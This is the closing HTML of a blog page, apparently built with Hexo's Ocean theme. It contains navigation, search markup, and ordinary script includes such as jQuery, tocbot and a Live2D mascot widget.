      <a class="nav-item-link nav-item-search" title="搜索">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/lazyload.min.js"></script>
<script src="/js/busuanzi-2.3.pure.min.js"></script>

  <script src="/fancybox/jquery.fancybox.min.js"></script>



  <script src="/js/tocbot.min.js"></script>
  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>


<script src="/js/ocean.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>